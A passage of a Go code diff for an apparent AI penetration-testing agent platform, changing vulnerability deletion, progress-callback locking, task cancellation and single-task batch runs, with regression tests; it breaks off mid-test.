clearQuery := `UPDATE project_facts SET related_vulnerability_id = NULL
|
||||||
|
WHERE related_vulnerability_id IN (SELECT id FROM vulnerabilities ` + where + `)`
|
||||||
|
if _, err := tx.Exec(clearQuery, args...); err != nil {
|
||||||
|
return 0, fmt.Errorf("清理事实漏洞关联失败: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
deleteQuery := `DELETE FROM vulnerabilities ` + where
|
||||||
|
result, err := tx.Exec(deleteQuery, args...)
|
||||||
|
if err != nil {
|
||||||
|
return 0, fmt.Errorf("批量删除漏洞失败: %w", err)
|
||||||
|
}
|
||||||
|
deleted, err := result.RowsAffected()
|
||||||
|
if err != nil {
|
||||||
|
return 0, fmt.Errorf("获取删除条数失败: %w", err)
|
||||||
|
}
|
||||||
|
if err := tx.Commit(); err != nil {
|
||||||
|
return 0, fmt.Errorf("提交事务失败: %w", err)
|
||||||
|
}
|
||||||
|
return deleted, nil
|
||||||
|
}
|
||||||
|
|
||||||
// DeleteVulnerability 删除漏洞
|
// DeleteVulnerability 删除漏洞
|
||||||
func (db *DB) DeleteVulnerability(id string) error {
|
func (db *DB) DeleteVulnerability(id string) error {
|
||||||
tx, err := db.Begin()
|
tx, err := db.Begin()
|
||||||
@@ -370,7 +403,7 @@ func (db *DB) GetVulnerabilityFilterOptions() (map[string][]string, error) {
|
|||||||
if err != nil {
|
if err != nil {
|
||||||
return nil, fmt.Errorf("查询漏洞ID建议失败: %w", err)
|
return nil, fmt.Errorf("查询漏洞ID建议失败: %w", err)
|
||||||
}
|
}
|
||||||
conversationIDs, err := collect(`SELECT DISTINCT conversation_id FROM vulnerabilities WHERE conversation_id <> '' ORDER BY created_at DESC LIMIT 500`)
|
conversationIDs, err := collect(`SELECT DISTINCT conversation_id FROM vulnerabilities WHERE conversation_id IS NOT NULL AND conversation_id <> '' ORDER BY created_at DESC LIMIT 500`)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
return nil, fmt.Errorf("查询会话ID建议失败: %w", err)
|
return nil, fmt.Errorf("查询会话ID建议失败: %w", err)
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -16,7 +16,8 @@ import (
|
|||||||
)
|
)
|
||||||
|
|
||||||
// ExecutionRecorder 可选,在 MCP 工具成功返回且带有 execution id 时回调(用于汇总 mcpExecutionIds)。
|
// ExecutionRecorder 可选,在 MCP 工具成功返回且带有 execution id 时回调(用于汇总 mcpExecutionIds)。
|
||||||
type ExecutionRecorder func(executionID string)
|
// toolCallID 来自 Eino compose.GetToolCallID,用于与 reduction 后的展示结果关联。
|
||||||
|
type ExecutionRecorder func(executionID, toolCallID string)
|
||||||
|
|
||||||
// ToolErrorPrefix 用于把内部 MCP 执行结果中的 IsError 标记传递到多代理上层。
|
// ToolErrorPrefix 用于把内部 MCP 执行结果中的 IsError 标记传递到多代理上层。
|
||||||
// Eino 工具通道目前只支持返回字符串,因此通过前缀标识,随后在多代理 runner 中解析为 success/isError。
|
// Eino 工具通道目前只支持返回字符串,因此通过前缀标识,随后在多代理 runner 中解析为 success/isError。
|
||||||
@@ -178,7 +179,7 @@ func runMCPToolInvocation(
|
|||||||
return "", nil
|
return "", nil
|
||||||
}
|
}
|
||||||
if res.ExecutionID != "" && record != nil {
|
if res.ExecutionID != "" && record != nil {
|
||||||
record(res.ExecutionID)
|
record(res.ExecutionID, compose.GetToolCallID(ctx))
|
||||||
}
|
}
|
||||||
if res.IsError {
|
if res.IsError {
|
||||||
return ToolErrorPrefix + res.Result, nil
|
return ToolErrorPrefix + res.Result, nil
|
||||||
|
|||||||
@@ -2,8 +2,8 @@ package einomcp
|
|||||||
|
|
||||||
import "sync"
|
import "sync"
|
||||||
|
|
||||||
// ToolInvokeNotifyHolder 由 Eino run loop 在迭代开始前 Set 回调;MCP 桥在每次 InvokableRun 结束时 Fire,
|
// ToolInvokeNotifyHolder 由 Eino run loop 在迭代开始前 Set 回调;MCP/execute 桥在工具调用结束时 Fire,
|
||||||
// 用于在 ADK 未透出 schema.Tool 事件时仍推送 tool_result、清 pending,避免 UI 卡在「执行中」或迭代末 force-close。
|
// 用于清除 pending tool_call(tool_result 由 ADK schema.Tool 事件推送,含流式工具与 reduction 后正文)。
|
||||||
type ToolInvokeNotifyHolder struct {
|
type ToolInvokeNotifyHolder struct {
|
||||||
mu sync.RWMutex
|
mu sync.RWMutex
|
||||||
fn func(toolCallID, toolName, einoAgent string, success bool, content string, invokeErr error)
|
fn func(toolCallID, toolName, einoAgent string, success bool, content string, invokeErr error)
|
||||||
|
|||||||
+166
-46
@@ -101,7 +101,40 @@ func sameResponseStreamMeta(a, b map[string]interface{}) bool {
|
|||||||
}
|
}
|
||||||
orchA, _ := a["orchestration"].(string)
|
orchA, _ := a["orchestration"].(string)
|
||||||
orchB, _ := b["orchestration"].(string)
|
orchB, _ := b["orchestration"].(string)
|
||||||
return strings.TrimSpace(orchA) == strings.TrimSpace(orchB)
|
if strings.TrimSpace(orchA) != strings.TrimSpace(orchB) {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
iterA := responseStreamIterationFromMeta(a)
|
||||||
|
iterB := responseStreamIterationFromMeta(b)
|
||||||
|
if iterA != 0 && iterB != 0 && iterA != iterB {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
streamA, _ := a["streamId"].(string)
|
||||||
|
streamB, _ := b["streamId"].(string)
|
||||||
|
streamA = strings.TrimSpace(streamA)
|
||||||
|
streamB = strings.TrimSpace(streamB)
|
||||||
|
if streamA != "" && streamB != "" && streamA != streamB {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
|
||||||
|
func responseStreamIterationFromMeta(m map[string]interface{}) int {
|
||||||
|
if m == nil {
|
||||||
|
return 0
|
||||||
|
}
|
||||||
|
switch v := m["iteration"].(type) {
|
||||||
|
case int:
|
||||||
|
return v
|
||||||
|
case int32:
|
||||||
|
return int(v)
|
||||||
|
case int64:
|
||||||
|
return int(v)
|
||||||
|
case float64:
|
||||||
|
return int(v)
|
||||||
|
default:
|
||||||
|
return 0
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
func discardPlanningIfEchoesToolResult(respPlan *responsePlanAgg, toolData interface{}) {
|
func discardPlanningIfEchoesToolResult(respPlan *responsePlanAgg, toolData interface{}) {
|
||||||
@@ -157,6 +190,21 @@ func (h *AgentHandler) SetAudit(s *audit.Service) {
|
|||||||
h.audit = s
|
h.audit = s
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// CancelRunningTaskForConversation stops any in-flight agent work for the conversation (idempotent).
|
||||||
|
func (h *AgentHandler) CancelRunningTaskForConversation(conversationID string) {
|
||||||
|
if h == nil || conversationID == "" || h.tasks == nil {
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if execID := h.tasks.ActiveMCPExecutionID(conversationID); execID != "" {
|
||||||
|
h.agent.CancelMCPToolExecutionWithNote(execID, "")
|
||||||
|
}
|
||||||
|
if ok, err := h.tasks.CancelTask(conversationID, ErrTaskCancelled); ok {
|
||||||
|
h.logger.Info("已取消会话运行中任务", zap.String("conversationId", conversationID))
|
||||||
|
} else if err != nil {
|
||||||
|
h.logger.Warn("取消会话运行中任务失败", zap.String("conversationId", conversationID), zap.Error(err))
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
// HitlToolWhitelistSaver 合并 HITL 免审批工具到全局配置并落盘
|
// HitlToolWhitelistSaver 合并 HITL 免审批工具到全局配置并落盘
|
||||||
type HitlToolWhitelistSaver interface {
|
type HitlToolWhitelistSaver interface {
|
||||||
MergeHitlToolWhitelistIntoConfig(add []string) error
|
MergeHitlToolWhitelistIntoConfig(add []string) error
|
||||||
@@ -598,27 +646,11 @@ func (h *AgentHandler) runRobotEinoSingleWithRetry(
|
|||||||
assistantMessageID string,
|
assistantMessageID string,
|
||||||
taskStatus *string,
|
taskStatus *string,
|
||||||
) (string, string, error) {
|
) (string, string, error) {
|
||||||
curHist := history
|
resultMA, errMA := multiagent.RunEinoSingleChatModelAgent(
|
||||||
curMsg := finalMessage
|
taskCtx, h.config, &h.config.MultiAgent, h.agent, h.db, h.logger,
|
||||||
segmentUserMessage := finalMessage
|
conversationID, h.conversationProjectID(conversationID), finalMessage, history, roleTools, progressCallback, nil, h.projectBlackboardBlock(conversationID),
|
||||||
var resultMA *multiagent.RunResult
|
)
|
||||||
var errMA error
|
if errMA != nil {
|
||||||
var transientRunAttempts int
|
|
||||||
for {
|
|
||||||
resultMA, errMA = multiagent.RunEinoSingleChatModelAgent(
|
|
||||||
taskCtx, h.config, &h.config.MultiAgent, h.agent, h.logger,
|
|
||||||
conversationID, curMsg, curHist, roleTools, progressCallback, nil, h.projectBlackboardBlock(conversationID),
|
|
||||||
)
|
|
||||||
if errMA == nil {
|
|
||||||
transientRunAttempts = 0
|
|
||||||
break
|
|
||||||
}
|
|
||||||
if handled, _ := h.handleEinoTransientRetryContinue(
|
|
||||||
taskCtx, conversationID, resultMA, errMA, &transientRunAttempts,
|
|
||||||
&curHist, &curMsg, segmentUserMessage, progressCallback, nil,
|
|
||||||
); handled {
|
|
||||||
continue
|
|
||||||
}
|
|
||||||
*taskStatus = "failed"
|
*taskStatus = "failed"
|
||||||
return h.finalizeRobotAgentError(taskCtx, assistantMessageID, conversationID, resultMA, errMA)
|
return h.finalizeRobotAgentError(taskCtx, assistantMessageID, conversationID, resultMA, errMA)
|
||||||
}
|
}
|
||||||
@@ -634,28 +666,12 @@ func (h *AgentHandler) runRobotMultiAgentWithRetry(
|
|||||||
assistantMessageID string,
|
assistantMessageID string,
|
||||||
taskStatus *string,
|
taskStatus *string,
|
||||||
) (string, string, error) {
|
) (string, string, error) {
|
||||||
curHist := history
|
resultMA, errMA := multiagent.RunDeepAgent(
|
||||||
curMsg := finalMessage
|
taskCtx, h.config, &h.config.MultiAgent, h.agent, h.db, h.logger,
|
||||||
segmentUserMessage := finalMessage
|
conversationID, h.conversationProjectID(conversationID), finalMessage, history, roleTools, progressCallback,
|
||||||
var resultMA *multiagent.RunResult
|
h.agentsMarkdownDir, orchestration, nil, h.projectBlackboardBlock(conversationID),
|
||||||
var errMA error
|
)
|
||||||
var transientRunAttempts int
|
if errMA != nil {
|
||||||
for {
|
|
||||||
resultMA, errMA = multiagent.RunDeepAgent(
|
|
||||||
taskCtx, h.config, &h.config.MultiAgent, h.agent, h.logger,
|
|
||||||
conversationID, curMsg, curHist, roleTools, progressCallback,
|
|
||||||
h.agentsMarkdownDir, orchestration, nil, h.projectBlackboardBlock(conversationID),
|
|
||||||
)
|
|
||||||
if errMA == nil {
|
|
||||||
transientRunAttempts = 0
|
|
||||||
break
|
|
||||||
}
|
|
||||||
if handled, _ := h.handleEinoTransientRetryContinue(
|
|
||||||
taskCtx, conversationID, resultMA, errMA, &transientRunAttempts,
|
|
||||||
&curHist, &curMsg, segmentUserMessage, progressCallback, nil,
|
|
||||||
); handled {
|
|
||||||
continue
|
|
||||||
}
|
|
||||||
*taskStatus = "failed"
|
*taskStatus = "failed"
|
||||||
return h.finalizeRobotAgentError(taskCtx, assistantMessageID, conversationID, resultMA, errMA)
|
return h.finalizeRobotAgentError(taskCtx, assistantMessageID, conversationID, resultMA, errMA)
|
||||||
}
|
}
|
||||||
@@ -830,6 +846,10 @@ func (h *AgentHandler) createProgressCallback(runCtx context.Context, cancelRun
|
|||||||
seenToolCallSigs := make(map[string]string) // toolCallId -> payload signature
|
seenToolCallSigs := make(map[string]string) // toolCallId -> payload signature
|
||||||
seenToolResultSigs := make(map[string]string) // toolCallId -> payload signature
|
seenToolResultSigs := make(map[string]string) // toolCallId -> payload signature
|
||||||
|
|
||||||
|
// progressMu 保护闭包内 map 与聚合状态。Eino parallelRunToolCall 会在多 goroutine 中并发回调
|
||||||
|
// progress(ToolInvokeNotifyHolder.Fire → createProgressCallback),未加锁的 map 会触发 fatal panic。
|
||||||
|
var progressMu sync.Mutex
|
||||||
|
|
||||||
// response_start + response_delta:前端时间线显示为「📝 规划中」(monitor.js),不落逐条 delta;
|
// response_start + response_delta:前端时间线显示为「📝 规划中」(monitor.js),不落逐条 delta;
|
||||||
// 聚合为一条 planning 写入 process_details,刷新后与线上一致。
|
// 聚合为一条 planning 写入 process_details,刷新后与线上一致。
|
||||||
var respPlan responsePlanAgg
|
var respPlan responsePlanAgg
|
||||||
@@ -891,6 +911,9 @@ func (h *AgentHandler) createProgressCallback(runCtx context.Context, cancelRun
|
|||||||
}
|
}
|
||||||
|
|
||||||
return func(eventType, message string, data interface{}) {
|
return func(eventType, message string, data interface{}) {
|
||||||
|
progressMu.Lock()
|
||||||
|
defer progressMu.Unlock()
|
||||||
|
|
||||||
// 上游在重试/补偿时可能重复回调相同 tool_call/tool_result。
|
// 上游在重试/补偿时可能重复回调相同 tool_call/tool_result。
|
||||||
// 这里做幂等过滤,保证前端展示和 process_details 都以唯一事件为准。
|
// 这里做幂等过滤,保证前端展示和 process_details 都以唯一事件为准。
|
||||||
if (eventType == "tool_call" || eventType == "tool_result") && data != nil {
|
if (eventType == "tool_call" || eventType == "tool_result") && data != nil {
|
||||||
@@ -1119,6 +1142,8 @@ func (h *AgentHandler) createProgressCallback(runCtx context.Context, cancelRun
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
flushResponsePlan()
|
flushResponsePlan()
|
||||||
|
// 助手正文开始前,推理流通常已结束;落库以便刷新后「渗透测试详情」可回放
|
||||||
|
flushThinkingStreams()
|
||||||
respPlan.meta = nil
|
respPlan.meta = nil
|
||||||
if dataMap, ok := data.(map[string]interface{}); ok {
|
if dataMap, ok := data.(map[string]interface{}); ok {
|
||||||
respPlan.meta = make(map[string]interface{}, len(dataMap))
|
respPlan.meta = make(map[string]interface{}, len(dataMap))
|
||||||
@@ -1154,6 +1179,19 @@ func (h *AgentHandler) createProgressCallback(runCtx context.Context, cancelRun
|
|||||||
}
|
}
|
||||||
if eventType == "response" {
|
if eventType == "response" {
|
||||||
flushResponsePlan()
|
flushResponsePlan()
|
||||||
|
flushThinkingStreams()
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if eventType == "done" {
|
||||||
|
flushResponsePlan()
|
||||||
|
flushThinkingStreams()
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
// 流式思考/推理结束:聚合落库(与 eino_agent_reply_stream_end 同理)
|
||||||
|
if eventType == "thinking_stream_end" || eventType == "reasoning_chain_stream_end" {
|
||||||
|
flushResponsePlan()
|
||||||
|
flushThinkingStreams()
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -1228,7 +1266,10 @@ func (h *AgentHandler) createProgressCallback(runCtx context.Context, cancelRun
|
|||||||
|
|
||||||
// 保存过程详情到数据库(排除 response/done;response 正文已在 messages 表)
|
// 保存过程详情到数据库(排除 response/done;response 正文已在 messages 表)
|
||||||
// response_start/response_delta 已聚合为 planning,不落逐条。
|
// response_start/response_delta 已聚合为 planning,不落逐条。
|
||||||
|
// [Eino] agent 心跳 progress 仅用于实时进度标题,不落库以免时间线刷屏。
|
||||||
|
skipEinoAgentHeartbeat := eventType == "progress" && strings.HasPrefix(strings.TrimSpace(message), "[Eino] ")
|
||||||
if assistantMessageID != "" &&
|
if assistantMessageID != "" &&
|
||||||
|
!skipEinoAgentHeartbeat &&
|
||||||
eventType != "response" &&
|
eventType != "response" &&
|
||||||
eventType != "done" &&
|
eventType != "done" &&
|
||||||
eventType != "response_start" &&
|
eventType != "response_start" &&
|
||||||
@@ -1295,6 +1336,21 @@ func (h *AgentHandler) CancelAgentLoop(c *gin.Context) {
|
|||||||
})
|
})
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
if h.tasks.AbortActiveEinoExecute(req.ConversationID, note) {
|
||||||
|
h.logger.Info("对话页仅终止当前 Eino execute",
|
||||||
|
zap.String("conversationId", req.ConversationID),
|
||||||
|
zap.Bool("hasNote", note != ""),
|
||||||
|
)
|
||||||
|
c.JSON(http.StatusOK, gin.H{
|
||||||
|
"status": "tool_abort_requested",
|
||||||
|
"conversationId": req.ConversationID,
|
||||||
|
"message": "已请求终止当前 execute 命令;命令返回后本轮推理将继续。",
|
||||||
|
"continueAfter": true,
|
||||||
|
"interruptWithNote": note != "",
|
||||||
|
"continueWithoutTool": false,
|
||||||
|
})
|
||||||
|
return
|
||||||
|
}
|
||||||
// 无进行中的 MCP 工具(模型纯推理/流式输出阶段):取消当前上下文并由 Eino 流式处理器合并用户补充后自动续跑。
|
// 无进行中的 MCP 工具(模型纯推理/流式输出阶段):取消当前上下文并由 Eino 流式处理器合并用户补充后自动续跑。
|
||||||
h.tasks.SetInterruptContinueNote(req.ConversationID, note)
|
h.tasks.SetInterruptContinueNote(req.ConversationID, note)
|
||||||
ok, err := h.tasks.CancelTask(req.ConversationID, multiagent.ErrInterruptContinue)
|
ok, err := h.tasks.CancelTask(req.ConversationID, multiagent.ErrInterruptContinue)
|
||||||
@@ -1597,6 +1653,7 @@ func (h *AgentHandler) ListBatchQueues(c *gin.Context) {
|
|||||||
// StartBatchQueue 开始执行批量任务队列
|
// StartBatchQueue 开始执行批量任务队列
|
||||||
func (h *AgentHandler) StartBatchQueue(c *gin.Context) {
|
func (h *AgentHandler) StartBatchQueue(c *gin.Context) {
|
||||||
queueID := c.Param("queueId")
|
queueID := c.Param("queueId")
|
||||||
|
h.batchTaskManager.ClearSingleRunTask(queueID)
|
||||||
ok, err := h.startBatchQueueExecution(queueID, false)
|
ok, err := h.startBatchQueueExecution(queueID, false)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||||
@@ -1628,6 +1685,7 @@ func (h *AgentHandler) RerunBatchQueue(c *gin.Context) {
|
|||||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "重置队列失败"})
|
c.JSON(http.StatusInternalServerError, gin.H{"error": "重置队列失败"})
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
h.batchTaskManager.ClearSingleRunTask(queueID)
|
||||||
ok, err := h.startBatchQueueExecution(queueID, false)
|
ok, err := h.startBatchQueueExecution(queueID, false)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||||
@@ -1827,6 +1885,53 @@ func (h *AgentHandler) AddBatchTask(c *gin.Context) {
|
|||||||
c.JSON(http.StatusOK, gin.H{"message": "任务已添加", "task": task, "queue": queue})
|
c.JSON(http.StatusOK, gin.H{"message": "任务已添加", "task": task, "queue": queue})
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// RunSingleBatchTask 单条执行指定子任务(可覆盖已成功项),完成后暂停队列
|
||||||
|
func (h *AgentHandler) RunSingleBatchTask(c *gin.Context) {
|
||||||
|
queueID := c.Param("queueId")
|
||||||
|
taskID := c.Param("taskId")
|
||||||
|
|
||||||
|
if err := h.batchTaskManager.PrepareSingleTaskRun(queueID, taskID); err != nil {
|
||||||
|
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||||
|
return
|
||||||
|
}
|
||||||
|
h.batchTaskManager.SetSingleRunTask(queueID, taskID)
|
||||||
|
|
||||||
|
// 暂停态单条执行:旧批量协程可能仍占用执行槽,先回收以便重新启动
|
||||||
|
if queue, ok := h.batchTaskManager.GetBatchQueue(queueID); ok && queue.Status == BatchQueueStatusPaused {
|
||||||
|
h.forceUnmarkBatchQueueRunning(queueID)
|
||||||
|
}
|
||||||
|
|
||||||
|
autoStarted := true
|
||||||
|
autoStartMsg := "已开始单条执行"
|
||||||
|
ok, startErr := h.startBatchQueueExecution(queueID, false)
|
||||||
|
if startErr != nil {
|
||||||
|
h.batchTaskManager.ClearSingleRunTask(queueID)
|
||||||
|
autoStarted = false
|
||||||
|
autoStartMsg = "任务已准备就绪,但自动启动失败: " + startErr.Error()
|
||||||
|
} else if !ok {
|
||||||
|
h.batchTaskManager.ClearSingleRunTask(queueID)
|
||||||
|
autoStarted = false
|
||||||
|
autoStartMsg = "任务已准备就绪,但队列不存在"
|
||||||
|
}
|
||||||
|
|
||||||
|
queue, exists := h.batchTaskManager.GetBatchQueue(queueID)
|
||||||
|
if !exists {
|
||||||
|
c.JSON(http.StatusNotFound, gin.H{"error": "队列不存在"})
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if h.audit != nil {
|
||||||
|
h.audit.RecordOK(c, "task", "run_single_batch_task", "单条执行批量子任务", "batch_task", taskID, map[string]interface{}{
|
||||||
|
"batch_queue_id": queueID,
|
||||||
|
"auto_started": autoStarted,
|
||||||
|
})
|
||||||
|
}
|
||||||
|
c.JSON(http.StatusOK, gin.H{
|
||||||
|
"message": autoStartMsg,
|
||||||
|
"queue": queue,
|
||||||
|
"autoStarted": autoStarted,
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
// DeleteBatchTask 删除批量任务
|
// DeleteBatchTask 删除批量任务
|
||||||
func (h *AgentHandler) DeleteBatchTask(c *gin.Context) {
|
func (h *AgentHandler) DeleteBatchTask(c *gin.Context) {
|
||||||
queueID := c.Param("queueId")
|
queueID := c.Param("queueId")
|
||||||
@@ -1868,6 +1973,10 @@ func (h *AgentHandler) unmarkBatchQueueRunning(queueID string) {
|
|||||||
delete(h.batchRunning, queueID)
|
delete(h.batchRunning, queueID)
|
||||||
}
|
}
|
||||||
|
|
||||||
|
func (h *AgentHandler) forceUnmarkBatchQueueRunning(queueID string) {
|
||||||
|
h.unmarkBatchQueueRunning(queueID)
|
||||||
|
}
|
||||||
|
|
||||||
func (h *AgentHandler) nextBatchQueueRunAt(cronExpr string, from time.Time) (*time.Time, error) {
|
func (h *AgentHandler) nextBatchQueueRunAt(cronExpr string, from time.Time) (*time.Time, error) {
|
||||||
expr := strings.TrimSpace(cronExpr)
|
expr := strings.TrimSpace(cronExpr)
|
||||||
if expr == "" {
|
if expr == "" {
|
||||||
@@ -2015,6 +2124,10 @@ func (h *AgentHandler) executeBatchQueue(queueID string) {
|
|||||||
h.logger.Error("创建对话失败", zap.String("queueId", queueID), zap.String("taskId", task.ID), zap.Error(err))
|
h.logger.Error("创建对话失败", zap.String("queueId", queueID), zap.String("taskId", task.ID), zap.Error(err))
|
||||||
h.batchTaskManager.UpdateTaskStatus(queueID, task.ID, "failed", "", "创建对话失败: "+err.Error())
|
h.batchTaskManager.UpdateTaskStatus(queueID, task.ID, "failed", "", "创建对话失败: "+err.Error())
|
||||||
h.batchTaskManager.MoveToNextTask(queueID)
|
h.batchTaskManager.MoveToNextTask(queueID)
|
||||||
|
if h.batchTaskManager.TakeSingleRunTaskIfMatch(queueID, task.ID) {
|
||||||
|
h.batchTaskManager.UpdateQueueStatus(queueID, "paused")
|
||||||
|
break
|
||||||
|
}
|
||||||
continue
|
continue
|
||||||
}
|
}
|
||||||
conversationID = conv.ID
|
conversationID = conv.ID
|
||||||
@@ -2132,6 +2245,7 @@ func (h *AgentHandler) executeBatchQueue(queueID string) {
|
|||||||
progressCallback = h.createProgressCallback(taskCtx, cancelWithCause, conversationID, assistantMessageID, sendEvent)
|
progressCallback = h.createProgressCallback(taskCtx, cancelWithCause, conversationID, assistantMessageID, sendEvent)
|
||||||
taskCtx = mcp.WithMCPConversationID(taskCtx, conversationID)
|
taskCtx = mcp.WithMCPConversationID(taskCtx, conversationID)
|
||||||
taskCtx = mcp.WithToolRunRegistry(taskCtx, h.tasks)
|
taskCtx = mcp.WithToolRunRegistry(taskCtx, h.tasks)
|
||||||
|
taskCtx = mcp.WithEinoExecuteRunRegistry(taskCtx, h.tasks)
|
||||||
|
|
||||||
// 使用队列配置的角色工具列表(如果为空,表示使用所有工具)
|
// 使用队列配置的角色工具列表(如果为空,表示使用所有工具)
|
||||||
useBatchMulti := false
|
useBatchMulti := false
|
||||||
@@ -2152,12 +2266,12 @@ func (h *AgentHandler) executeBatchQueue(queueID string) {
|
|||||||
var runErr error
|
var runErr error
|
||||||
switch {
|
switch {
|
||||||
case useBatchMulti:
|
case useBatchMulti:
|
||||||
resultMA, runErr = multiagent.RunDeepAgent(taskCtx, h.config, &h.config.MultiAgent, h.agent, h.logger, conversationID, finalMessage, []agent.ChatMessage{}, roleTools, progressCallback, h.agentsMarkdownDir, batchOrch, nil, h.projectBlackboardBlock(conversationID))
|
resultMA, runErr = multiagent.RunDeepAgent(taskCtx, h.config, &h.config.MultiAgent, h.agent, h.db, h.logger, conversationID, h.conversationProjectID(conversationID), finalMessage, []agent.ChatMessage{}, roleTools, progressCallback, h.agentsMarkdownDir, batchOrch, nil, h.projectBlackboardBlock(conversationID))
|
||||||
default:
|
default:
|
||||||
if h.config == nil {
|
if h.config == nil {
|
||||||
runErr = fmt.Errorf("服务器配置未加载")
|
runErr = fmt.Errorf("服务器配置未加载")
|
||||||
} else {
|
} else {
|
||||||
resultMA, runErr = multiagent.RunEinoSingleChatModelAgent(taskCtx, h.config, &h.config.MultiAgent, h.agent, h.logger, conversationID, finalMessage, []agent.ChatMessage{}, roleTools, progressCallback, nil, h.projectBlackboardBlock(conversationID))
|
resultMA, runErr = multiagent.RunEinoSingleChatModelAgent(taskCtx, h.config, &h.config.MultiAgent, h.agent, h.db, h.logger, conversationID, h.conversationProjectID(conversationID), finalMessage, []agent.ChatMessage{}, roleTools, progressCallback, nil, h.projectBlackboardBlock(conversationID))
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -2271,6 +2385,12 @@ func (h *AgentHandler) executeBatchQueue(queueID string) {
|
|||||||
// 移动到下一个任务
|
// 移动到下一个任务
|
||||||
h.batchTaskManager.MoveToNextTask(queueID)
|
h.batchTaskManager.MoveToNextTask(queueID)
|
||||||
|
|
||||||
|
if h.batchTaskManager.TakeSingleRunTaskIfMatch(queueID, task.ID) {
|
||||||
|
h.batchTaskManager.UpdateQueueStatus(queueID, "paused")
|
||||||
|
h.logger.Info("单条执行完成,队列已暂停", zap.String("queueId", queueID), zap.String("taskId", task.ID))
|
||||||
|
break
|
||||||
|
}
|
||||||
|
|
||||||
// 检查是否被取消或暂停
|
// 检查是否被取消或暂停
|
||||||
queue, _ = h.batchTaskManager.GetBatchQueue(queueID)
|
queue, _ = h.batchTaskManager.GetBatchQueue(queueID)
|
||||||
if queue.Status == "cancelled" || queue.Status == "paused" {
|
if queue.Status == "cancelled" || queue.Status == "paused" {
|
||||||
|
|||||||
@@ -0,0 +1,99 @@
|
|||||||
|
package handler
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"fmt"
|
||||||
|
"os"
|
||||||
|
"path/filepath"
|
||||||
|
"sync"
|
||||||
|
"testing"
|
||||||
|
|
||||||
|
"cyberstrike-ai/internal/config"
|
||||||
|
"cyberstrike-ai/internal/database"
|
||||||
|
"cyberstrike-ai/internal/openai"
|
||||||
|
|
||||||
|
"go.uber.org/zap"
|
||||||
|
)
|
||||||
|
|
||||||
|
// TestCreateProgressCallback_ConcurrentToolEvents 回归 issue #142:并行 tool 回调不得 concurrent map panic。
|
||||||
|
func TestCreateProgressCallback_ConcurrentToolEvents(t *testing.T) {
|
||||||
|
logger := zap.NewNop()
|
||||||
|
h := &AgentHandler{
|
||||||
|
logger: logger,
|
||||||
|
config: &config.Config{},
|
||||||
|
}
|
||||||
|
cb := h.createProgressCallback(context.Background(), nil, "conv-race-test", "", nil)
|
||||||
|
|
||||||
|
const workers = 64
|
||||||
|
var wg sync.WaitGroup
|
||||||
|
wg.Add(workers * 2)
|
||||||
|
for i := 0; i < workers; i++ {
|
||||||
|
i := i
|
||||||
|
go func() {
|
||||||
|
defer wg.Done()
|
||||||
|
toolCallID := fmt.Sprintf("tc-%d", i)
|
||||||
|
cb("tool_call", "calling skill", map[string]interface{}{
|
||||||
|
"toolCallId": toolCallID,
|
||||||
|
"toolName": "skill",
|
||||||
|
"argumentsObj": map[string]interface{}{"skill_name": "demo-skill"},
|
||||||
|
})
|
||||||
|
}()
|
||||||
|
go func() {
|
||||||
|
defer wg.Done()
|
||||||
|
toolCallID := fmt.Sprintf("tc-%d", i)
|
||||||
|
cb("tool_result", "skill done", map[string]interface{}{
|
||||||
|
"toolCallId": toolCallID,
|
||||||
|
"toolName": "skill",
|
||||||
|
"success": true,
|
||||||
|
})
|
||||||
|
}()
|
||||||
|
}
|
||||||
|
wg.Wait()
|
||||||
|
}
|
||||||
|
|
||||||
|
// TestCreateProgressCallback_FlushesReasoningOnDone 流式推理聚合须在 done/response 时落库,刷新后可回放。
|
||||||
|
func TestCreateProgressCallback_FlushesReasoningOnDone(t *testing.T) {
|
||||||
|
tmp := t.TempDir()
|
||||||
|
db, err := database.NewDB(filepath.Join(tmp, "test.sqlite"), zap.NewNop())
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("NewDB: %v", err)
|
||||||
|
}
|
||||||
|
defer os.RemoveAll(tmp)
|
||||||
|
|
||||||
|
conv, err := db.CreateConversation("test", database.ConversationCreateMeta{})
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateConversation: %v", err)
|
||||||
|
}
|
||||||
|
asst, err := db.AddMessage(conv.ID, "assistant", "处理中...", nil)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("AddMessage: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
h := &AgentHandler{logger: zap.NewNop(), db: db}
|
||||||
|
cb := h.createProgressCallback(context.Background(), nil, conv.ID, asst.ID, nil)
|
||||||
|
|
||||||
|
streamID := "eino-reasoning-test-1"
|
||||||
|
cb("reasoning_chain_stream_start", " ", map[string]interface{}{
|
||||||
|
"streamId": streamID,
|
||||||
|
"source": "eino",
|
